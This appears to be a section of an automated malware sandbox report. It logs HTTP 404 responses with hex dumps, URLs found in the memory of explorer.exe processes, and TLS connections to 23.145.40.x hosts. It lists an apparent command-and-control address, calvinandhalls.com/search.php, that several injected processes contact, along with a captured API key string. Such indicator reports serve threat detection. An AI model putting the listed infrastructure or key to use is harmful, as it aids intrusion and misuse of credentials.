                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:01:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:02:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:02:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:02:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:02:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:02:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:03:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:03:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:03:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 25 Sep 2024 14:04:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000002.00000000.2123559301.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127227127.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000002.00000000.2126713671.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125996604.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126747794.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000002.00000000.2129926685.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 00000002.00000000.2129326664.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000002.00000000.2125128556.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2125128556.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2124263465.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/
                Source: explorer.exe, 00000009.00000002.2999912401.00000000035D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/earch.phpX
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpI
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2947253493.00000000004F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4536695596.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.4536019543.0000000001119000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4537067944.0000000003207000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4535707850.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpx
                Source: explorer.exe, 00000009.00000002.2999912401.0000000003560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com:443/search.phpge
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000002.00000000.2127227127.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000002.00000000.2129326664.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000002.00000000.2127227127.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: explorer.exe, 00000009.00000003.2965923859.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 6B89.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49749 version: TLS 1.2
